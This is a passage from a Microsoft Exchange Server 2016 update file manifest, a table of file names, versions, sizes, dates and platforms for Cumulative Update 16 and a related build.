20:10| Not applicable \nRightsmanagementwrapper.dll| 15.1.2044.6| 86,392| 12-Aug-2020| 20:14| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,794| 12-Aug-2020| 20:14| Not applicable \nRpcperf.dll| 15.1.2044.6| 23,424| 12-Aug-2020| 20:15| x64 \nRpcproxyshim.dll| 15.1.2044.6| 39,296| 12-Aug-2020| 20:15| x64 \nRulesauditmsg.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:14| x64 \nRwsperfcounters.xml| Not applicable| 22,232| 12-Aug-2020| 20:11| Not applicable \nSafehtmlnativewrapper.dll| 15.1.2044.6| 34,688| 12-Aug-2020| 20:15| x64 \nScanenginetest.exe| 15.1.2044.6| 956,288| 12-Aug-2020| 20:10| x64 \nScanningprocess.exe| 15.1.2044.6| 738,688| 12-Aug-2020| 20:15| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,816| 12-Aug-2020| 20:14| Not applicable \nServicecontrol.ps1| Not applicable| 52,317| 12-Aug-2020| 20:13| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,758| 12-Aug-2020| 20:14| Not applicable \nSettingsadapter.dll| 15.1.2044.6| 116,104| 12-Aug-2020| 20:10| x64 \nSetup.exe| 15.1.2044.6| 20,864| 12-Aug-2020| 20:15| x86 \nSetupui.exe| 15.1.2044.6| 49,024| 12-Aug-2020| 20:15| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,193| 12-Aug-2020| 20:14| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,835| 12-Aug-2020| 20:10| Not applicable \nStatisticsutil.dll| 15.1.2044.6| 142,208| 12-Aug-2020| 20:15| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,121| 12-Aug-2020| 20:10| Not applicable \nStoretsconstants.ps1| Not applicable| 15,818| 12-Aug-2020| 20:10| Not applicable \nStoretslibrary.ps1| Not applicable| 27,991| 12-Aug-2020| 20:10| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.2044.6| 28,544| 12-Aug-2020| 20:15| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,931| 12-Aug-2020| 20:14| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,977| 12-Aug-2020| 20:14| Not applicable \nTextconversionmodule.dll| 15.1.2044.6| 86,400| 12-Aug-2020| 20:13| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,715| 12-Aug-2020| 20:10| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,421| 12-Aug-2020| 20:10| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,017| 12-Aug-2020| 20:10| Not applicable \nUmservice.exe| 15.1.2044.6| 100,224| 12-Aug-2020| 20:15| x86 \nUmworkerprocess.exe| 15.1.2044.6| 38,280| 12-Aug-2020| 20:14| x86 \nUninstall_antispamagents.ps1| Not applicable| 15,461| 12-Aug-2020| 20:10| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,034| 12-Aug-2020| 20:14| Not applicable \nUpdatecas.ps1| Not applicable| 32,952| 12-Aug-2020| 20:15| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,730| 12-Aug-2020| 20:15| Not applicable \nUpdateserver.exe| 15.1.2044.6| 3,014,520| 12-Aug-2020| 20:10| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,160| 12-Aug-2020| 20:14| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,815| 12-Aug-2020| 20:12| Not applicable \nWsbexchange.exe| 15.1.2044.6| 125,304| 12-Aug-2020| 20:15| x64 \nX400prox.dll| 15.1.2044.6| 103,304| 12-Aug-2020| 20:10| x64 \n_search.lingoperators.a| 15.1.2044.6| 34,696| 12-Aug-2020| 20:10| Not applicable \n_search.lingoperators.b| 15.1.2044.6| 34,696| 12-Aug-2020| 20:10| Not applicable \n_search.mailboxoperators.a| 15.1.2044.6| 289,160| 12-Aug-2020| 20:11| Not applicable \n_search.mailboxoperators.b| 15.1.2044.6| 289,160| 12-Aug-2020| 20:11| Not applicable \n_search.operatorschema.a| 15.1.2044.6| 483,200| 12-Aug-2020| 20:10| Not applicable \n_search.operatorschema.b| 15.1.2044.6| 483,200| 12-Aug-2020| 20:10| Not applicable \n_search.tokenoperators.a| 15.1.2044.6| 106,880| 12-Aug-2020| 20:10| Not applicable \n_search.tokenoperators.b| 15.1.2044.6| 106,880| 12-Aug-2020| 20:10| Not applicable \n_search.transportoperators.a| 15.1.2044.6| 64,896| 12-Aug-2020| 20:10| Not applicable \n_search.transportoperators.b| 15.1.2044.6| 64,896| 12-Aug-2020| 20:10| Not applicable \n \n## \n\n__\n\nExchange Server 2016 Cumulative Update 16\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.1.1979.6| 71,032| 12-Aug-2020| 20:47| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 12-Aug-2020| 20:47| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,929| 12-Aug-2020| 20:49| Not applicable \nAdemodule.dll| 15.1.1979.6| 106,376| 12-Aug-2020| 20:48| x64 \nAirfilter.dll| 15.1.1979.6| 42,872| 12-Aug-2020| 20:50| x64 \nAjaxcontroltoolkit.dll| 15.1.1979.6| 92,552| 12-Aug-2020| 20:49| x86 \nAntispamcommon.ps1| Not applicable| 13,505| 12-Aug-2020| 20:51| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 12-Aug-2020| 20:48| Not applicable \nAsentirs.msi| Not applicable| 77,824| 12-Aug-2020| 20:48| Not applicable \nAsentsig.msi| Not applicable| 73,728| 12-Aug-2020| 20:48| Not applicable \nBigfunnel.bondtypes.dll| 15.1.1979.6| 43,912| 12-Aug-2020| 20:48| x86 \nBigfunnel.common.dll| 15.1.1979.6| 63,872| 12-Aug-2020| 20:48| x86 \nBigfunnel.configuration.dll| 15.1.1979.6| 99,200| 12-Aug-2020| 20:48| x86 \nBigfunnel.entropy.dll| 15.1.1979.6| 44,416| 12-Aug-2020| 20:51| x86 \nBigfunnel.filter.dll| 15.1.1979.6| 54,136| 12-Aug-2020| 20:51| x86 \nBigfunnel.indexstream.dll| 15.1.1979.6| 54,152| 12-Aug-2020| 20:49| x86 \nBigfunnel.poi.dll| 15.1.1979.6| 203,648| 12-Aug-2020| 20:51| x86 \nBigfunnel.postinglist.dll| 15.1.1979.6| 122,240| 12-Aug-2020| 20:48| x86 \nBigfunnel.query.dll| 15.1.1979.6| 99,712| 12-Aug-2020| 20:49| x86 \nBigfunnel.ranking.dll| 15.1.1979.6| 79,232| 12-Aug-2020| 20:48| x86 \nBigfunnel.syntheticdatalib.dll| 15.1.1979.6| 3,634,568| 12-Aug-2020| 20:49| x86 \nBigfunnel.wordbreakers.dll| 15.1.1979.6| 46,472| 12-Aug-2020| 20:48| x86 \nCafe_airfilter_dll| 15.1.1979.6| 42,872| 12-Aug-2020| 20:50| x64 \nCafe_exppw_dll| 15.1.1979.6| 83,328| 12-Aug-2020| 20:48| x64 \nCafe_owaauth_dll| 15.1.1979.6| 92,032| 12-Aug-2020| 20:51| x64 \nCalcalculation.ps1| Not applicable| 42,097| 12-Aug-2020| 20:48| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,622| 12-Aug-2020| 20:48| Not applicable \nChksgfiles.dll| 15.1.1979.6| 57,224| 12-Aug-2020| 20:49| x64 \nCitsconstants.ps1| Not applicable| 15,821| 12-Aug-2020| 20:51| Not applicable \nCitslibrary.ps1| Not applicable| 82,680| 12-Aug-2020| 20:51| Not applicable \nCitstypes.ps1| Not applicable| 14,480| 12-Aug-2020| 20:51| Not applicable \nClassificationengine_mce| 15.1.1979.6| 1,692,544| 12-Aug-2020| 20:48| Not applicable \nClusmsg.dll| 15.1.1979.6| 134,008| 12-Aug-2020| 20:49| x64 \nCoconet.dll| 15.1.1979.6| 48,000| 12-Aug-2020| 20:47| x64 \nCollectovermetrics.ps1| Not applicable| 81,660| 12-Aug-2020| 20:49| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,886| 12-Aug-2020| 20:49| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,931| 12-Aug-2020| 20:48| Not applicable \nComplianceauditservice.exe| 15.1.1979.6| 39,808| 12-Aug-2020| 20:51| x86 \nConfigureadam.ps1| Not applicable| 22,764| 12-Aug-2020| 20:49| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,308| 12-Aug-2020| 20:50| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,770| 12-Aug-2020| 20:49| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,828| 12-Aug-2020| 20:49| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,283| 12-Aug-2020| 20:51| Not applicable \nConnectfunctions.ps1| Not applicable| 37,125| 12-Aug-2020| 20:48| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 29,620| 12-Aug-2020| 20:48| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,232| 12-Aug-2020| 20:50| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,053| 12-Aug-2020| 20:49| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,532| 12-Aug-2020| 20:50| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,765| 12-Aug-2020| 20:49| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,912| 12-Aug-2020| 20:49| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts_exsmime.dll| 15.1.1979.6| 380,808| 12-Aug-2020| 20:49| x64 \nCts_microsoft.exchange.data.common.dll| 15.1.1979.6| 1,686,920| 12-Aug-2020| 20:49| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:04| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:47| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:50| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:47| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:47| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:48| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:47| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:48| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:47| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,664| 12-Aug-2020| 20:47| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:47| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:48| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:47| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:50| x86 \nDagcommonlibrary.ps1| Not applicable| 60,242| 12-Aug-2020| 20:47| Not applicable \nDependentassemblygenerator.exe| 15.1.1979.6| 22,400| 12-Aug-2020| 20:48| x86 \nDiaghelper.dll| 15.1.1979.6| 66,952| 12-Aug-2020| 20:48| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,350| 12-Aug-2020| 20:50| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,362| 12-Aug-2020| 20:49| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,189| 12-Aug-2020| 20:50| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,654| 12-Aug-2020| 20:50| Not applicable \nDisklockerapi.dll| Not applicable| 22,400| 12-Aug-2020| 20:48| x64 \nDlmigrationmodule.psm1| Not applicable| 39,580| 12-Aug-2020| 20:49| Not applicable \nDsaccessperf.dll| 15.1.1979.6| 45,952| 12-Aug-2020| 20:47| x64 \nDscperf.dll| 15.1.1979.6| 32,640| 12-Aug-2020| 20:52| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.1.1979.6| 1,686,920| 12-Aug-2020| 20:49| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.1979.6| 601,464| 12-Aug-2020| 20:48| x86 \nEcpperfcounters.xml| Not applicable| 30,352| 12-Aug-2020| 20:52| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:51| x86 \nEdgetransport.exe| 15.1.1979.6| 49,536| 12-Aug-2020| 20:51| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 18:04| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:49| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:49| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:49| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:51| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,664| 12-Aug-2020| 20:49| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:49| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:49| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:51| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.1979.6| 13,184| 12-Aug-2020| 20:50| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:49| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:50| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:49| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,364| 12-Aug-2020| 20:49| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,563| 12-Aug-2020| 20:51| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,588| 12-Aug-2020| 20:49| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,598| 12-Aug-2020| 20:49| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,916| 12-Aug-2020| 20:49| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,647| 12-Aug-2020| 20:50| Not applicable \nEngineupdateserviceinterfaces.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:48| x86 \nEscprint.dll| 15.1.1979.6| 20,360| 12-Aug-2020| 20:47| x64 \nEse.dll| 15.1.1979.6| 3,695,496| 12-Aug-2020| 20:47| x64 \nEseback2.dll| 15.1.1979.6| 325,000| 12-Aug-2020| 20:47| x64 \nEsebcli2.dll| 15.1.1979.6| 292,736| 12-Aug-2020| 20:47| x64 \nEseperf.dll| 15.1.1979.6| 116,104| 12-Aug-2020| 20:46| x64 \nEseutil.exe| 15.1.1979.6| 398,728| 12-Aug-2020| 20:49| x64 \nEsevss.dll| 15.1.1979.6| 44,424| 12-Aug-2020| 20:47| x64 \nEtweseproviderresources.dll| 15.1.1979.6| 82,304| 12-Aug-2020| 20:47| x64 \nEventperf.dll| 15.1.1979.6| 59,776| 12-Aug-2020| 20:49| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,093| 12-Aug-2020| 20:49| Not applicable \nExchange.format.ps1xml| Not applicable| 648,596| 12-Aug-2020| 20:49| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 43,310| 12-Aug-2020| 20:49| Not applicable \nExchange.ps1| Not applicable| 20,791| 12-Aug-2020| 20:48| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,535| 12-Aug-2020| 20:51| Not applicable \nExchange.types.ps1xml| Not applicable| 365,133| 12-Aug-2020| 20:49| Not applicable \nExchangeudfcommon.dll| 15.1.1979.6| 121,728| 12-Aug-2020| 20:48| x86 \nExchangeudfs.dll| 15.1.1979.6| 269,704| 12-Aug-2020| 20:49| x86 \nExchmem.dll| 15.1.1979.6| 85,896| 12-Aug-2020| 20:47| x64 \nExchsetupmsg.dll| 15.1.1979.6| 19,328| 12-Aug-2020| 20:51| x64 \nExchucutil.ps1| Not applicable| 23,920| 12-Aug-2020| 20:49| Not applicable \nExdbfailureitemapi.dll| Not applicable| 27,000| 12-Aug-2020| 20:48| x64 \nExdbmsg.dll| 15.1.1979.6| 229,768| 12-Aug-2020| 20:50| x64 \nExeventperfplugin.dll| 15.1.1979.6| 25,472| 12-Aug-2020| 20:48| x64 \nExmime.dll| 15.1.1979.6| 364,936| 12-Aug-2020| 20:51| x64 \nExportedgeconfig.ps1| Not applicable| 27,391| 12-Aug-2020| 20:50| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,558| 12-Aug-2020| 20:49| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,854| 12-Aug-2020| 20:49| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,378| 12-Aug-2020| 20:51| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,125| 12-Aug-2020| 20:49| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,044| 12-Aug-2020| 20:49| Not applicable \nExppw.dll| 15.1.1979.6| 83,328| 12-Aug-2020| 20:48| x64 \nExprfdll.dll| 15.1.1979.6| 26,504| 12-Aug-2020| 20:52| x64 \nExrpc32.dll| 15.1.1979.6| 1,922,944| 12-Aug-2020| 20:48| x64 \nExrw.dll| 15.1.1979.6| 28,024| 12-Aug-2020| 20:47| x64 \nExsetdata.dll| 15.1.1979.6| 2,779,520| 12-Aug-2020| 20:50| x64 \nExsetup.exe| 15.1.1979.6| 35,200| 12-Aug-2020| 20:48| x86 \nExsetupui.exe| 15.1.1979.6| 193,416| 12-Aug-2020| 20:48| x86 \nExtrace.dll| 15.1.1979.6| 245,128| 12-Aug-2020| 20:47| x64 \nExt_microsoft.exchange.data.transport.dll| 15.1.1979.6| 601,464| 12-Aug-2020| 20:48| x86 \nExwatson.dll| 15.1.1979.6| 44,936| 12-Aug-2020| 20:46| x64 \nFastioext.dll| 15.1.1979.6| 60,296| 12-Aug-2020| 20:48| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,715| 12-Aug-2020| 20:47| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,262| 12-Aug-2020| 20:47| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,794| 12-Aug-2020| 20:47| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 12-Aug-2020| 20:50| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 12-Aug-2020| 20:50| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,693| 12-Aug-2020| 20:47| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,712| 12-Aug-2020| 20:47| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,688| 12-Aug-2020| 20:47| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 12-Aug-2020| 20:50| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 12-Aug-2020| 20:47| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 12-Aug-2020| 20:47| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,788| 12-Aug-2020| 20:48| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,597,359| 12-Aug-2020| 20:47| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,597,359| 12-Aug-2020| 20:47| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,597,359| 12-Aug-2020| 20:47| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,764| 12-Aug-2020| 20:48| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,794| 12-Aug-2020| 20:47| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,597,359| 12-Aug-2020| 20:47| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,718| 12-Aug-2020| 20:47| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,597,359| 12-Aug-2020| 20:47| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,742| 12-Aug-2020| 20:47| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,791| 12-Aug-2020| 20:47| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,718| 12-Aug-2020| 20:47| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 12-Aug-2020| 20:51| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,787,974| 12-Aug-2020| 20:51| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,711| 12-Aug-2020| 20:47| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,718| 12-Aug-2020| 20:47| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,597,359| 12-Aug-2020| 20:47| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,724| 12-Aug-2020| 20:47| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 12-Aug-2020| 20:50| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,231| 12-Aug-2020| 20:50| Not applicable \nFilteringpowershell.dll| 15.1.1979.6| 223,112| 12-Aug-2020| 20:49| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,652| 12-Aug-2020| 20:49| Not applicable \nFiltermodule.dll| 15.1.1979.6| 180,104| 12-Aug-2020| 20:49| x64 \nFipexeuperfctrresource.dll| 15.1.1979.6| 15,240| 12-Aug-2020| 20:48| x64 \nFipexeventsresource.dll| 15.1.1979.6| 44,928| 12-Aug-2020| 20:49| x64 \nFipexperfctrresource.dll| 15.1.1979.6| 32,648| 12-Aug-2020| 20:49| x64 \nFirewallres.dll| 15.1.1979.6| 72,584| 12-Aug-2020| 20:49| x64 \nFms.exe| 15.1.1979.6| 1,350,016| 12-Aug-2020| 20:49| x64 \nForefrontactivedirectoryconnector.exe| 15.1.1979.6| 110,976| 12-Aug-2020| 20:48| x64 \nFpsdiag.exe| 15.1.1979.6| 18,824| 12-Aug-2020| 20:48| x86 \nFsccachedfilemanagedlocal.dll| 15.1.1979.6| 822,152| 12-Aug-2020| 20:48| x64 \nFscconfigsupport.dll| 15.1.1979.6| 56,696| 12-Aug-2020| 20:49| x86 \nFscconfigurationserver.exe| 15.1.1979.6| 430,984| 12-Aug-2020| 20:48| x64 \nFscconfigurationserverinterfaces.dll| 15.1.1979.6| 15,752| 12-Aug-2020| 20:49| x86 \nFsccrypto.dll| 15.1.1979.6| 208,768| 12-Aug-2020| 20:48| x64 \nFscipcinterfaceslocal.dll| 15.1.1979.6| 28,552| 12-Aug-2020| 20:48| x86 \nFscipclocal.dll| 15.1.1979.6| 38,280| 12-Aug-2020| 20:49| x86 \nFscsqmuploader.exe| 15.1.1979.6| 453,504| 12-Aug-2020| 20:48| x64 \nGetucpool.ps1| Not applicable| 19,775| 12-Aug-2020| 20:49| Not applicable \nGetvalidengines.ps1| Not applicable| 13,290| 12-Aug-2020| 20:51| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,809| 12-Aug-2020| 20:51| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,655| 12-Aug-2020| 20:51| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,727| 12-Aug-2020| 20:51| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,775| 12-Aug-2020| 20:51| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,498| 12-Aug-2020| 20:51| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,705| 12-Aug-2020| 20:51| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,810| 12-Aug-2020| 20:51| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,336| 12-Aug-2020| 20:49| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,947| 12-Aug-2020| 20:50| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,026| 12-Aug-2020| 20:49| Not applicable \nGet_storetrace.ps1| Not applicable| 50,631| 12-Aug-2020| 20:49| Not applicable \nHuffman_xpress.dll| 15.1.1979.6| 32,648| 12-Aug-2020| 20:47| x64 \nImportedgeconfig.ps1| Not applicable| 77,248| 12-Aug-2020| 20:49| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,480| 12-Aug-2020| 20:49| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,818| 12-Aug-2020| 20:49| Not applicable \nInproxy.dll| 15.1.1979.6| 85,880| 12-Aug-2020| 20:47| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,523| 12-Aug-2020| 20:48| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,929| 12-Aug-2020| 20:51| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,967| 12-Aug-2020| 20:51| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.1979.6| 107,392| 12-Aug-2020| 20:47| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.1979.6| 20,352| 12-Aug-2020| 20:48| Not applicable \nInterop.certenroll.dll| 15.1.1979.6| 142,720| 12-Aug-2020| 20:48| x86 \nInterop.licenseinfointerface.dll| 